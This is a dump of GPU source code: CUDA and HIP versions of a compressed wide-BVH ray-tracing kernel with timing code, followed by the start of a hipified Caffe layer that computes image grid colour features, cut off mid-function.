(fabsf(dir.z) > ooeps ? dir.z : copysignf(ooeps, dir.z)); // inverse ray direction octinv = ((dir.x < 0 ? 1 : 0) << 2) | ((dir.y < 0 ? 1 : 0) << 1) | ((dir.z < 0 ? 1 : 0) << 0); octinv = 7 - octinv; nodeGroup = make_uint2(0, 0b10000000000000000000000000000000); triangleGroup = make_uint2(0); stackPtr = 0; hitAddr = -1; } #if DYNAMIC_FETCH int lostLoopIterations = 0; #endif do { if (nodeGroup.y > 0x00FFFFFF) { const unsigned int hits = nodeGroup.y; const unsigned int imask = nodeGroup.y; const unsigned int child_bit_index = __bfind(hits); const unsigned int child_node_base_index = nodeGroup.x; nodeGroup.y &= ~(1 << child_bit_index); if (nodeGroup.y > 0x00FFFFFF) { STACK_PUSH(nodeGroup); } { const unsigned int slot_index = (child_bit_index - 24) ^ octinv; const unsigned int octinv4 = octinv * 0x01010101u; const unsigned int relative_index = __popc(imask & ~(0xFFFFFFFF << slot_index)); const unsigned int child_node_index = child_node_base_index + relative_index; float4 n0, n1, n2, n3, n4; n0 = __ldg(localBVHTreeNodes + child_node_index * 5 + 0); n1 = __ldg(localBVHTreeNodes + child_node_index * 5 + 1); n2 = __ldg(localBVHTreeNodes + child_node_index * 5 + 2); n3 = __ldg(localBVHTreeNodes + child_node_index * 5 + 3); n4 = __ldg(localBVHTreeNodes + child_node_index * 5 + 4); float3 p = make_float3(n0); int3 e; e.x = *((char*)&n0.w + 0); e.y = *((char*)&n0.w + 1); e.z = *((char*)&n0.w + 2); nodeGroup.x = float_as_uint(n1.x); triangleGroup.x = float_as_uint(n1.y); triangleGroup.y = 0; unsigned int hitmask = 0; const float adjusted_idirx = uint_as_float((e.x + 127) << 23) * idirx; const float adjusted_idiry = uint_as_float((e.y + 127) << 23) * idiry; const float adjusted_idirz = uint_as_float((e.z + 127) << 23) * idirz; const float origx = -(orig.x - p.x) * idirx; const float origy = -(orig.y - p.y) * idiry; const float origz = -(orig.z - p.z) * idirz; { // First 4 const unsigned int meta4 = float_as_uint(n1.z); const unsigned int is_inner4 = (meta4 & (meta4 << 1)) & 0x10101010; const unsigned int inner_mask4 = sign_extend_s8x4(is_inner4 << 3); const unsigned int bit_index4 = (meta4 ^ (octinv4 & inner_mask4)) & 0x1F1F1F1F; const unsigned int child_bits4 = (meta4 >> 5) & 0x07070707; // Potential micro-optimization: use PRMT to do the selection here, as described by the paper uint swizzledLox = (idirx < 0) ? float_as_uint(n3.z) : float_as_uint(n2.x); uint swizzledHix = (idirx < 0) ? float_as_uint(n2.x) : float_as_uint(n3.z); uint swizzledLoy = (idiry < 0) ? float_as_uint(n4.x) : float_as_uint(n2.z); uint swizzledHiy = (idiry < 0) ? float_as_uint(n2.z) : float_as_uint(n4.x); uint swizzledLoz = (idirz < 0) ? float_as_uint(n4.z) : float_as_uint(n3.x); uint swizzledHiz = (idirz < 0) ? float_as_uint(n3.x) : float_as_uint(n4.z); float tminx[4]; float tminy[4]; float tminz[4]; float tmaxx[4]; float tmaxy[4]; float tmaxz[4]; tminx[0] = ((swizzledLox >> 0) & 0xFF) * adjusted_idirx + origx; tminx[1] = ((swizzledLox >> 8) & 0xFF) * adjusted_idirx + origx; tminx[2] = ((swizzledLox >> 16) & 0xFF) * adjusted_idirx + origx; tminx[3] = ((swizzledLox >> 24) & 0xFF) * adjusted_idirx + origx; tminy[0] = ((swizzledLoy >> 0) & 0xFF) * adjusted_idiry + origy; tminy[1] = ((swizzledLoy >> 8) & 0xFF) * adjusted_idiry + origy; tminy[2] = ((swizzledLoy >> 16) & 0xFF) * adjusted_idiry + origy; tminy[3] = ((swizzledLoy >> 24) & 0xFF) * adjusted_idiry + origy; tminz[0] = ((swizzledLoz >> 0) & 0xFF) * adjusted_idirz + origz; tminz[1] = ((swizzledLoz >> 8) & 0xFF) * adjusted_idirz + origz; tminz[2] = ((swizzledLoz >> 16) & 0xFF) * adjusted_idirz + origz; tminz[3] = ((swizzledLoz >> 24) & 0xFF) * adjusted_idirz + origz; tmaxx[0] = ((swizzledHix >> 0) & 0xFF) * adjusted_idirx + origx; tmaxx[1] = ((swizzledHix >> 8) & 0xFF) * adjusted_idirx + origx; tmaxx[2] = ((swizzledHix >> 16) & 0xFF) * adjusted_idirx + origx; tmaxx[3] = ((swizzledHix >> 24) & 0xFF) * adjusted_idirx + origx; tmaxy[0] = ((swizzledHiy >> 0) & 0xFF) * adjusted_idiry + origy; tmaxy[1] = ((swizzledHiy >> 8) & 0xFF) * adjusted_idiry + origy; tmaxy[2] = ((swizzledHiy >> 16) & 0xFF) * adjusted_idiry + origy; tmaxy[3] = ((swizzledHiy >> 24) & 0xFF) * adjusted_idiry + origy; tmaxz[0] = ((swizzledHiz >> 0) & 0xFF) * adjusted_idirz + origz; tmaxz[1] = ((swizzledHiz >> 8) & 0xFF) * adjusted_idirz + origz; tmaxz[2] = ((swizzledHiz >> 16) & 0xFF) * adjusted_idirz + origz; tmaxz[3] = ((swizzledHiz >> 24) & 0xFF) * adjusted_idirz + origz; for (int childIndex = 0; childIndex < 4; childIndex++) { // Use VMIN, VMAX to compute the slabs const float cmin = fmaxf(fmax_fmax(tminx[childIndex], tminy[childIndex], tminz[childIndex]), tmin); const float cmax = fminf(fmin_fmin(tmaxx[childIndex], tmaxy[childIndex], tmaxz[childIndex]), tmax); bool intersected = cmin <= cmax; // Potential micro-optimization: use VSHL to implement this part, as described by the paper if (intersected) { const unsigned int child_bits = extract_byte(child_bits4, childIndex); const unsigned int bit_index = extract_byte(bit_index4, childIndex); hitmask |= child_bits << bit_index; } } } { // Second 4 const unsigned int meta4 = float_as_uint(n1.w); const unsigned int is_inner4 = (meta4 & (meta4 << 1)) & 0x10101010; const unsigned int inner_mask4 = sign_extend_s8x4(is_inner4 << 3); const unsigned int bit_index4 = (meta4 ^ (octinv4 & inner_mask4)) & 0x1F1F1F1F; const unsigned int child_bits4 = (meta4 >> 5) & 0x07070707; // Potential micro-optimization: use PRMT to do the selection here, as described by the paper uint swizzledLox = (idirx < 0) ? float_as_uint(n3.w) : float_as_uint(n2.y); uint swizzledHix = (idirx < 0) ? float_as_uint(n2.y) : float_as_uint(n3.w); uint swizzledLoy = (idiry < 0) ? float_as_uint(n4.y) : float_as_uint(n2.w); uint swizzledHiy = (idiry < 0) ? float_as_uint(n2.w) : float_as_uint(n4.y); uint swizzledLoz = (idirz < 0) ? float_as_uint(n4.w) : float_as_uint(n3.y); uint swizzledHiz = (idirz < 0) ? float_as_uint(n3.y) : float_as_uint(n4.w); float tminx[4]; float tminy[4]; float tminz[4]; float tmaxx[4]; float tmaxy[4]; float tmaxz[4]; tminx[0] = ((swizzledLox >> 0) & 0xFF) * adjusted_idirx + origx; tminx[1] = ((swizzledLox >> 8) & 0xFF) * adjusted_idirx + origx; tminx[2] = ((swizzledLox >> 16) & 0xFF) * adjusted_idirx + origx; tminx[3] = ((swizzledLox >> 24) & 0xFF) * adjusted_idirx + origx; tminy[0] = ((swizzledLoy >> 0) & 0xFF) * adjusted_idiry + origy; tminy[1] = ((swizzledLoy >> 8) & 0xFF) * adjusted_idiry + origy; tminy[2] = ((swizzledLoy >> 16) & 0xFF) * adjusted_idiry + origy; tminy[3] = ((swizzledLoy >> 24) & 0xFF) * adjusted_idiry + origy; tminz[0] = ((swizzledLoz >> 0) & 0xFF) * adjusted_idirz + origz; tminz[1] = ((swizzledLoz >> 8) & 0xFF) * adjusted_idirz + origz; tminz[2] = ((swizzledLoz >> 16) & 0xFF) * adjusted_idirz + origz; tminz[3] = ((swizzledLoz >> 24) & 0xFF) * adjusted_idirz + origz; tmaxx[0] = ((swizzledHix >> 0) & 0xFF) * adjusted_idirx + origx; tmaxx[1] = ((swizzledHix >> 8) & 0xFF) * adjusted_idirx + origx; tmaxx[2] = ((swizzledHix >> 16) & 0xFF) * adjusted_idirx + origx; tmaxx[3] = ((swizzledHix >> 24) & 0xFF) * adjusted_idirx + origx; tmaxy[0] = ((swizzledHiy >> 0) & 0xFF) * adjusted_idiry + origy; tmaxy[1] = ((swizzledHiy >> 8) & 0xFF) * adjusted_idiry + origy; tmaxy[2] = ((swizzledHiy >> 16) & 0xFF) * adjusted_idiry + origy; tmaxy[3] = ((swizzledHiy >> 24) & 0xFF) * adjusted_idiry + origy; tmaxz[0] = ((swizzledHiz >> 0) & 0xFF) * adjusted_idirz + origz; tmaxz[1] = ((swizzledHiz >> 8) & 0xFF) * adjusted_idirz + origz; tmaxz[2] = ((swizzledHiz >> 16) & 0xFF) * adjusted_idirz + origz; tmaxz[3] = ((swizzledHiz >> 24) & 0xFF) * adjusted_idirz + origz; for (int childIndex = 0; childIndex < 4; childIndex++) { // Use VMIN, VMAX to compute the slabs const float cmin = fmaxf(fmax_fmax(tminx[childIndex], tminy[childIndex], tminz[childIndex]), tmin); const float cmax = fminf(fmin_fmin(tmaxx[childIndex], tmaxy[childIndex], tmaxz[childIndex]), tmax); bool intersected = cmin <= cmax; // Potential micro-optimization: use VSHL to implement this part, as described by the paper if (intersected) { const unsigned int child_bits = extract_byte(child_bits4, childIndex); const unsigned int bit_index = extract_byte(bit_index4, childIndex); hitmask |= child_bits << bit_index; } } } nodeGroup.y = (hitmask & 0xFF000000) | (*((byte*)&n0.w + 3)); triangleGroup.y = hitmask & 0x00FFFFFF; } } else { triangleGroup = nodeGroup; nodeGroup = make_uint2(0); } #if TRIANGLE_POSTPONING const int totalThreads = __popc(__activemask()); #endif while (triangleGroup.y != 0) { #if TRIANGLE_POSTPONING const float Rt = 0.2; const int threshold = totalThreads * Rt; const int numActiveThreads = __popc(__activemask()); if (numActiveThreads < threshold) { STACK_PUSH(triangleGroup); break; } #endif int triangleIndex = __bfind(triangleGroup.y); int triAddr = triangleGroup.x * 3 + triangleIndex * 3; float4 v00 = __ldg(localTriangleWoopCoordinates + triAddr + 0); float4 v11 = __ldg(localTriangleWoopCoordinates + triAddr + 1); float4 v22 = __ldg(localTriangleWoopCoordinates + triAddr + 2); float Oz = v00.w - orig.x*v00.x - orig.y*v00.y - orig.z*v00.z; float invDz = 1.0f / (dir.x*v00.x + dir.y*v00.y + dir.z*v00.z); float t = Oz * invDz; float Ox = v11.w + orig.x*v11.x + orig.y*v11.y + orig.z*v11.z; float Dx = dir.x * v11.x + dir.y * v11.y + dir.z * v11.z; float u = Ox + t * Dx; float Oy = v22.w + orig.x*v22.x + orig.y*v22.y + orig.z*v22.z; float Dy = dir.x*v22.x + dir.y*v22.y + dir.z*v22.z; float v = Oy + t*Dy; if (t > tmin && t < tmax) { if (u >= 0.0f && u <= 1.0f) { if (v >= 0.0f && u + v <= 1.0f) { triangleuv.x = u; triangleuv.y = v; tmax = t; hitAddr = triAddr; } } } triangleGroup.y &= ~(1 << triangleIndex); } if (nodeGroup.y <= 0x00FFFFFF) { if (stackPtr > 0) { STACK_POP(nodeGroup); } else { rayResultBuffer[rayidx].t_triId_u_v = make_float4(tmax, int_as_float(hitAddr), triangleuv.x, triangleuv.y); break; } } #if DYNAMIC_FETCH const int Nd = 4; const int Nw = 16; lostLoopIterations += __popc(__activemask()) - Nd; if (lostLoopIterations >= Nw) break; #endif } while (true); } while (true); } __host__ void rtBindCWBVHData( const float4* InBVHTreeNodes, const float4* InTriangleWoopCoordinates, const int* InMappingFromTriangleAddressToIndex) { cudaCheck(hipMemcpyToSymbol(MappingFromTriangleAddressToIndex, &InMappingFromTriangleAddressToIndex, 1 * sizeof(InMappingFromTriangleAddressToIndex))); cudaCheck(hipMemcpyToSymbol(TriangleWoopCoordinates, &InTriangleWoopCoordinates, 1 * sizeof(InTriangleWoopCoordinates))); cudaCheck(hipMemcpyToSymbol(BVHTreeNodes, &InBVHTreeNodes, 1 * sizeof(InBVHTreeNodes))); } __host__ void rtTraceCWBVH( Ray* rayBuffer, Hit* rayResultBuffer, int rayCount ) { float elapsedTime; hipEvent_t startEvent, stopEvent; cudaCheck(hipEventCreate(&startEvent)); cudaCheck(hipEventCreate(&stopEvent)); int* cudaFinishedRayCount; cudaCheck(hipMalloc(&cudaFinishedRayCount, sizeof(int))); dim3 blockDim(32, 2); dim3 gridDim(32, 32); hipProfilerStart(); cudaCheck(hipEventRecord(startEvent, 0)); { hipMemset(cudaFinishedRayCount, 0, sizeof(int)); hipLaunchKernelGGL(( rtTraceCWBVHDynamicFetch) , dim3(gridDim), dim3(blockDim) , 0, 0, rayBuffer, rayResultBuffer, rayCount, cudaFinishedRayCount ); } cudaCheck(hipEventRecord(stopEvent, 0)); cudaCheck(hipEventSynchronize(stopEvent)); cudaCheck(hipEventElapsedTime(&elapsedTime, startEvent, stopEvent)); Log("%.3fMS, %.2fMRays/s (rtTraceCWBVH Dynamic Fetch)", elapsedTime, (float)rayCount / 1000000.0f / (elapsedTime / 1000.0f)); hipProfilerStop(); hipFree(cudaFinishedRayCount); }
7508b6a3d70a35bdba48ac9621a59b73cf6059e9.cu
#include <cuda_profiler_api.h> #include "helper_math.h" #include "FastDeviceMinMax.h" #include "Logger.h" #include "CUDAAssert.h" __device__ unsigned __bfind(unsigned i) { unsigned b; asm volatile("bfind.u32 %0, %1; " : "=r"(b) : "r"(i)); return b; } __device__ __inline__ uint sign_extend_s8x4(uint i) { uint v; asm("prmt.b32 %0, %1, 0x0, 0x0000BA98;" : "=r"(v) : "r"(i)); return v; } __device__ __inline__ uint extract_byte(uint i, uint n) { return (i >> (n * 8)) & 0xFF; } __device__ const float4* BVHTreeNodes; __device__ const float4* TriangleWoopCoordinates; __device__ const int* MappingFromTriangleAddressToIndex; #define DYNAMIC_FETCH 1 #define TRIANGLE_POSTPONING 1 #define STACK_POP(X) { --stackPtr; if (stackPtr < SM_STACK_SIZE) X = traversalStackSM[threadIdx.x][threadIdx.y][stackPtr]; else X = traversalStack[stackPtr - SM_STACK_SIZE]; } #define STACK_PUSH(X) { if (stackPtr < SM_STACK_SIZE) traversalStackSM[threadIdx.x][threadIdx.y][stackPtr] = X; else traversalStack[stackPtr - SM_STACK_SIZE] = X; stackPtr++; } __global__ void rtTraceCWBVHDynamicFetch( Ray* rayBuffer, Hit* rayResultBuffer, int rayCount, int* finishedRayCount ) { const float ooeps = exp2f(-80.0f); const int STACK_SIZE = 32; uint2 traversalStack[STACK_SIZE]; const int SM_STACK_SIZE = 8; // Slightly smaller stack size than the paper (12), as this seems faster on my GTX1080 __shared__ uint2 traversalStackSM[32][2][SM_STACK_SIZE]; int rayidx; float3 orig, dir; float tmin, tmax; float idirx, idiry, idirz; uint octinv; uint2 nodeGroup = make_uint2(0); uint2 triangleGroup = make_uint2(0); char stackPtr = 0; int hitAddr = -1; float2 triangleuv; __shared__ int nextRayArray[2]; const float4* localBVHTreeNodes = BVHTreeNodes; const float4* localTriangleWoopCoordinates = TriangleWoopCoordinates; do { int& rayBase = nextRayArray[threadIdx.y]; bool terminated = stackPtr == 0 && nodeGroup.y <= 0x00FFFFFF; const unsigned int maskTerminated = __ballot_sync(__activemask(), terminated); const int numTerminated = __popc(maskTerminated); const int idxTerminated = __popc(maskTerminated & ((1u << threadIdx.x) - 1)); if (terminated) { if (idxTerminated == 0) rayBase = atomicAdd(finishedRayCount, numTerminated); rayidx = rayBase + idxTerminated; if (rayidx >= rayCount) break; orig = make_float3(rayBuffer[rayidx].origin_tmin); dir = make_float3(rayBuffer[rayidx].dir_tmax); tmin = rayBuffer[rayidx].origin_tmin.w; tmax = rayBuffer[rayidx].dir_tmax.w; idirx = 1.0f / (fabsf(dir.x) > ooeps ? dir.x : copysignf(ooeps, dir.x)); // inverse ray direction idiry = 1.0f / (fabsf(dir.y) > ooeps ? dir.y : copysignf(ooeps, dir.y)); // inverse ray direction idirz = 1.0f / (fabsf(dir.z) > ooeps ? dir.z : copysignf(ooeps, dir.z)); // inverse ray direction octinv = ((dir.x < 0 ? 1 : 0) << 2) | ((dir.y < 0 ? 1 : 0) << 1) | ((dir.z < 0 ? 1 : 0) << 0); octinv = 7 - octinv; nodeGroup = make_uint2(0, 0b10000000000000000000000000000000); triangleGroup = make_uint2(0); stackPtr = 0; hitAddr = -1; } #if DYNAMIC_FETCH int lostLoopIterations = 0; #endif do { if (nodeGroup.y > 0x00FFFFFF) { const unsigned int hits = nodeGroup.y; const unsigned int imask = nodeGroup.y; const unsigned int child_bit_index = __bfind(hits); const unsigned int child_node_base_index = nodeGroup.x; nodeGroup.y &= ~(1 << child_bit_index); if (nodeGroup.y > 0x00FFFFFF) { STACK_PUSH(nodeGroup); } { const unsigned int slot_index = (child_bit_index - 24) ^ octinv; const unsigned int octinv4 = octinv * 0x01010101u; const unsigned int relative_index = __popc(imask & ~(0xFFFFFFFF << slot_index)); const unsigned int child_node_index = child_node_base_index + relative_index; float4 n0, n1, n2, n3, n4; n0 = __ldg(localBVHTreeNodes + child_node_index * 5 + 0); n1 = __ldg(localBVHTreeNodes + child_node_index * 5 + 1); n2 = __ldg(localBVHTreeNodes + child_node_index * 5 + 2); n3 = __ldg(localBVHTreeNodes + child_node_index * 5 + 3); n4 = __ldg(localBVHTreeNodes + child_node_index * 5 + 4); float3 p = make_float3(n0); int3 e; e.x = *((char*)&n0.w + 0); e.y = *((char*)&n0.w + 1); e.z = *((char*)&n0.w + 2); nodeGroup.x = float_as_uint(n1.x); triangleGroup.x = float_as_uint(n1.y); triangleGroup.y = 0; unsigned int hitmask = 0; const float adjusted_idirx = uint_as_float((e.x + 127) << 23) * idirx; const float adjusted_idiry = uint_as_float((e.y + 127) << 23) * idiry; const float adjusted_idirz = uint_as_float((e.z + 127) << 23) * idirz; const float origx = -(orig.x - p.x) * idirx; const float origy = -(orig.y - p.y) * idiry; const float origz = -(orig.z - p.z) * idirz; { // First 4 const unsigned int meta4 = float_as_uint(n1.z); const unsigned int is_inner4 = (meta4 & (meta4 << 1)) & 0x10101010; const unsigned int inner_mask4 = sign_extend_s8x4(is_inner4 << 3); const unsigned int bit_index4 = (meta4 ^ (octinv4 & inner_mask4)) & 0x1F1F1F1F; const unsigned int child_bits4 = (meta4 >> 5) & 0x07070707; // Potential micro-optimization: use PRMT to do the selection here, as described by the paper uint swizzledLox = (idirx < 0) ? float_as_uint(n3.z) : float_as_uint(n2.x); uint swizzledHix = (idirx < 0) ? float_as_uint(n2.x) : float_as_uint(n3.z); uint swizzledLoy = (idiry < 0) ? float_as_uint(n4.x) : float_as_uint(n2.z); uint swizzledHiy = (idiry < 0) ? float_as_uint(n2.z) : float_as_uint(n4.x); uint swizzledLoz = (idirz < 0) ? float_as_uint(n4.z) : float_as_uint(n3.x); uint swizzledHiz = (idirz < 0) ? float_as_uint(n3.x) : float_as_uint(n4.z); float tminx[4]; float tminy[4]; float tminz[4]; float tmaxx[4]; float tmaxy[4]; float tmaxz[4]; tminx[0] = ((swizzledLox >> 0) & 0xFF) * adjusted_idirx + origx; tminx[1] = ((swizzledLox >> 8) & 0xFF) * adjusted_idirx + origx; tminx[2] = ((swizzledLox >> 16) & 0xFF) * adjusted_idirx + origx; tminx[3] = ((swizzledLox >> 24) & 0xFF) * adjusted_idirx + origx; tminy[0] = ((swizzledLoy >> 0) & 0xFF) * adjusted_idiry + origy; tminy[1] = ((swizzledLoy >> 8) & 0xFF) * adjusted_idiry + origy; tminy[2] = ((swizzledLoy >> 16) & 0xFF) * adjusted_idiry + origy; tminy[3] = ((swizzledLoy >> 24) & 0xFF) * adjusted_idiry + origy; tminz[0] = ((swizzledLoz >> 0) & 0xFF) * adjusted_idirz + origz; tminz[1] = ((swizzledLoz >> 8) & 0xFF) * adjusted_idirz + origz; tminz[2] = ((swizzledLoz >> 16) & 0xFF) * adjusted_idirz + origz; tminz[3] = ((swizzledLoz >> 24) & 0xFF) * adjusted_idirz + origz; tmaxx[0] = ((swizzledHix >> 0) & 0xFF) * adjusted_idirx + origx; tmaxx[1] = ((swizzledHix >> 8) & 0xFF) * adjusted_idirx + origx; tmaxx[2] = ((swizzledHix >> 16) & 0xFF) * adjusted_idirx + origx; tmaxx[3] = ((swizzledHix >> 24) & 0xFF) * adjusted_idirx + origx; tmaxy[0] = ((swizzledHiy >> 0) & 0xFF) * adjusted_idiry + origy; tmaxy[1] = ((swizzledHiy >> 8) & 0xFF) * adjusted_idiry + origy; tmaxy[2] = ((swizzledHiy >> 16) & 0xFF) * adjusted_idiry + origy; tmaxy[3] = ((swizzledHiy >> 24) & 0xFF) * adjusted_idiry + origy; tmaxz[0] = ((swizzledHiz >> 0) & 0xFF) * adjusted_idirz + origz; tmaxz[1] = ((swizzledHiz >> 8) & 0xFF) * adjusted_idirz + origz; tmaxz[2] = ((swizzledHiz >> 16) & 0xFF) * adjusted_idirz + origz; tmaxz[3] = ((swizzledHiz >> 24) & 0xFF) * adjusted_idirz + origz; for (int childIndex = 0; childIndex < 4; childIndex++) { // Use VMIN, VMAX to compute the slabs const float cmin = fmaxf(fmax_fmax(tminx[childIndex], tminy[childIndex], tminz[childIndex]), tmin); const float cmax = fminf(fmin_fmin(tmaxx[childIndex], tmaxy[childIndex], tmaxz[childIndex]), tmax); bool intersected = cmin <= cmax; // Potential micro-optimization: use VSHL to implement this part, as described by the paper if (intersected) { const unsigned int child_bits = extract_byte(child_bits4, childIndex); const unsigned int bit_index = extract_byte(bit_index4, childIndex); hitmask |= child_bits << bit_index; } } } { // Second 4 const unsigned int meta4 = float_as_uint(n1.w); const unsigned int is_inner4 = (meta4 & (meta4 << 1)) & 0x10101010; const unsigned int inner_mask4 = sign_extend_s8x4(is_inner4 << 3); const unsigned int bit_index4 = (meta4 ^ (octinv4 & inner_mask4)) & 0x1F1F1F1F; const unsigned int child_bits4 = (meta4 >> 5) & 0x07070707; // Potential micro-optimization: use PRMT to do the selection here, as described by the paper uint swizzledLox = (idirx < 0) ? float_as_uint(n3.w) : float_as_uint(n2.y); uint swizzledHix = (idirx < 0) ? float_as_uint(n2.y) : float_as_uint(n3.w); uint swizzledLoy = (idiry < 0) ? float_as_uint(n4.y) : float_as_uint(n2.w); uint swizzledHiy = (idiry < 0) ? float_as_uint(n2.w) : float_as_uint(n4.y); uint swizzledLoz = (idirz < 0) ? float_as_uint(n4.w) : float_as_uint(n3.y); uint swizzledHiz = (idirz < 0) ? float_as_uint(n3.y) : float_as_uint(n4.w); float tminx[4]; float tminy[4]; float tminz[4]; float tmaxx[4]; float tmaxy[4]; float tmaxz[4]; tminx[0] = ((swizzledLox >> 0) & 0xFF) * adjusted_idirx + origx; tminx[1] = ((swizzledLox >> 8) & 0xFF) * adjusted_idirx + origx; tminx[2] = ((swizzledLox >> 16) & 0xFF) * adjusted_idirx + origx; tminx[3] = ((swizzledLox >> 24) & 0xFF) * adjusted_idirx + origx; tminy[0] = ((swizzledLoy >> 0) & 0xFF) * adjusted_idiry + origy; tminy[1] = ((swizzledLoy >> 8) & 0xFF) * adjusted_idiry + origy; tminy[2] = ((swizzledLoy >> 16) & 0xFF) * adjusted_idiry + origy; tminy[3] = ((swizzledLoy >> 24) & 0xFF) * adjusted_idiry + origy; tminz[0] = ((swizzledLoz >> 0) & 0xFF) * adjusted_idirz + origz; tminz[1] = ((swizzledLoz >> 8) & 0xFF) * adjusted_idirz + origz; tminz[2] = ((swizzledLoz >> 16) & 0xFF) * adjusted_idirz + origz; tminz[3] = ((swizzledLoz >> 24) & 0xFF) * adjusted_idirz + origz; tmaxx[0] = ((swizzledHix >> 0) & 0xFF) * adjusted_idirx + origx; tmaxx[1] = ((swizzledHix >> 8) & 0xFF) * adjusted_idirx + origx; tmaxx[2] = ((swizzledHix >> 16) & 0xFF) * adjusted_idirx + origx; tmaxx[3] = ((swizzledHix >> 24) & 0xFF) * adjusted_idirx + origx; tmaxy[0] = ((swizzledHiy >> 0) & 0xFF) * adjusted_idiry + origy; tmaxy[1] = ((swizzledHiy >> 8) & 0xFF) * adjusted_idiry + origy; tmaxy[2] = ((swizzledHiy >> 16) & 0xFF) * adjusted_idiry + origy; tmaxy[3] = ((swizzledHiy >> 24) & 0xFF) * adjusted_idiry + origy; tmaxz[0] = ((swizzledHiz >> 0) & 0xFF) * adjusted_idirz + origz; tmaxz[1] = ((swizzledHiz >> 8) & 0xFF) * adjusted_idirz + origz; tmaxz[2] = ((swizzledHiz >> 16) & 0xFF) * adjusted_idirz + origz; tmaxz[3] = ((swizzledHiz >> 24) & 0xFF) * adjusted_idirz + origz; for (int childIndex = 0; childIndex < 4; childIndex++) { // Use VMIN, VMAX to compute the slabs const float cmin = fmaxf(fmax_fmax(tminx[childIndex], tminy[childIndex], tminz[childIndex]), tmin); const float cmax = fminf(fmin_fmin(tmaxx[childIndex], tmaxy[childIndex], tmaxz[childIndex]), tmax); bool intersected = cmin <= cmax; // Potential micro-optimization: use VSHL to implement this part, as described by the paper if (intersected) { const unsigned int child_bits = extract_byte(child_bits4, childIndex); const unsigned int bit_index = extract_byte(bit_index4, childIndex); hitmask |= child_bits << bit_index; } } } nodeGroup.y = (hitmask & 0xFF000000) | (*((byte*)&n0.w + 3)); triangleGroup.y = hitmask & 0x00FFFFFF; } } else { triangleGroup = nodeGroup; nodeGroup = make_uint2(0); } #if TRIANGLE_POSTPONING const int totalThreads = __popc(__activemask()); #endif while (triangleGroup.y != 0) { #if TRIANGLE_POSTPONING const float Rt = 0.2; const int threshold = totalThreads * Rt; const int numActiveThreads = __popc(__activemask()); if (numActiveThreads < threshold) { STACK_PUSH(triangleGroup); break; } #endif int triangleIndex = __bfind(triangleGroup.y); int triAddr = triangleGroup.x * 3 + triangleIndex * 3; float4 v00 = __ldg(localTriangleWoopCoordinates + triAddr + 0); float4 v11 = __ldg(localTriangleWoopCoordinates + triAddr + 1); float4 v22 = __ldg(localTriangleWoopCoordinates + triAddr + 2); float Oz = v00.w - orig.x*v00.x - orig.y*v00.y - orig.z*v00.z; float invDz = 1.0f / (dir.x*v00.x + dir.y*v00.y + dir.z*v00.z); float t = Oz * invDz; float Ox = v11.w + orig.x*v11.x + orig.y*v11.y + orig.z*v11.z; float Dx = dir.x * v11.x + dir.y * v11.y + dir.z * v11.z; float u = Ox + t * Dx; float Oy = v22.w + orig.x*v22.x + orig.y*v22.y + orig.z*v22.z; float Dy = dir.x*v22.x + dir.y*v22.y + dir.z*v22.z; float v = Oy + t*Dy; if (t > tmin && t < tmax) { if (u >= 0.0f && u <= 1.0f) { if (v >= 0.0f && u + v <= 1.0f) { triangleuv.x = u; triangleuv.y = v; tmax = t; hitAddr = triAddr; } } } triangleGroup.y &= ~(1 << triangleIndex); } if (nodeGroup.y <= 0x00FFFFFF) { if (stackPtr > 0) { STACK_POP(nodeGroup); } else { rayResultBuffer[rayidx].t_triId_u_v = make_float4(tmax, int_as_float(hitAddr), triangleuv.x, triangleuv.y); break; } } #if DYNAMIC_FETCH const int Nd = 4; const int Nw = 16; lostLoopIterations += __popc(__activemask()) - Nd; if (lostLoopIterations >= Nw) break; #endif } while (true); } while (true); } __host__ void rtBindCWBVHData( const float4* InBVHTreeNodes, const float4* InTriangleWoopCoordinates, const int* InMappingFromTriangleAddressToIndex) { cudaCheck(cudaMemcpyToSymbol(MappingFromTriangleAddressToIndex, &InMappingFromTriangleAddressToIndex, 1 * sizeof(InMappingFromTriangleAddressToIndex))); cudaCheck(cudaMemcpyToSymbol(TriangleWoopCoordinates, &InTriangleWoopCoordinates, 1 * sizeof(InTriangleWoopCoordinates))); cudaCheck(cudaMemcpyToSymbol(BVHTreeNodes, &InBVHTreeNodes, 1 * sizeof(InBVHTreeNodes))); } __host__ void rtTraceCWBVH( Ray* rayBuffer, Hit* rayResultBuffer, int rayCount ) { float elapsedTime; cudaEvent_t startEvent, stopEvent; cudaCheck(cudaEventCreate(&startEvent)); cudaCheck(cudaEventCreate(&stopEvent)); int* cudaFinishedRayCount; cudaCheck(cudaMalloc(&cudaFinishedRayCount, sizeof(int))); dim3 blockDim(32, 2); dim3 gridDim(32, 32); cudaProfilerStart(); cudaCheck(cudaEventRecord(startEvent, 0)); { cudaMemset(cudaFinishedRayCount, 0, sizeof(int)); rtTraceCWBVHDynamicFetch <<< gridDim, blockDim >>> ( rayBuffer, rayResultBuffer, rayCount, cudaFinishedRayCount ); } cudaCheck(cudaEventRecord(stopEvent, 0)); cudaCheck(cudaEventSynchronize(stopEvent)); cudaCheck(cudaEventElapsedTime(&elapsedTime, startEvent, stopEvent)); Log("%.3fMS, %.2fMRays/s (rtTraceCWBVH Dynamic Fetch)", elapsedTime, (float)rayCount / 1000000.0f / (elapsedTime / 1000.0f)); cudaProfilerStop(); cudaFree(cudaFinishedRayCount); }
4ae4d817aeba51488562dce2a1e5f6feede2c4e5.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <iostream> #include <cstdio> #include <opencv2/core/core.hpp> #include <opencv2/imgproc/imgproc.hpp> #include <opencv2/highgui/highgui.hpp> #include <boost/chrono.hpp> #include "caffe/layers/lowlevel_distance_layer.hpp" using std::cout; using std::endl; using cv::Mat; namespace caffe { // Calculate Grid features template <typename Dtype> __global__ void CalculateGridFeatures(const int nthreads, const int grid_size, const int num, const int channels, const int height, const int width, const Dtype* const data, Handcrafted* grid_features) { CUDA_KERNEL_LOOP(index, nthreads) { const int n = index / (grid_size * grid_size); const int grid_index = index % (grid_size * grid_size); const int grid_x = grid_index % grid_size; const int grid_y = grid_index / grid_size; const int output_idx = (n * grid_size + grid_y) * grid_size + grid_x; const int x_start = grid_x * (width / grid_size); const int x_end = (grid_x + 1) * (width / grid_size) - 1; const int y_start = grid_y * (height / grid_size); const int y_end = (grid_y + 1) * (height / grid_size) - 1; float color_mean[10] = {0}; float color_histo[10][8] = {0}; // collect features for (int c = 0; c < channels; c++) { // (0, 1, 2) : 0-mean normalized BGR data const Dtype* data_slice = data + (n * channels + c) * height * width; for (int y = y_start; y < y_end; y++) { for (int x = x_start; x < x_end; x++) { 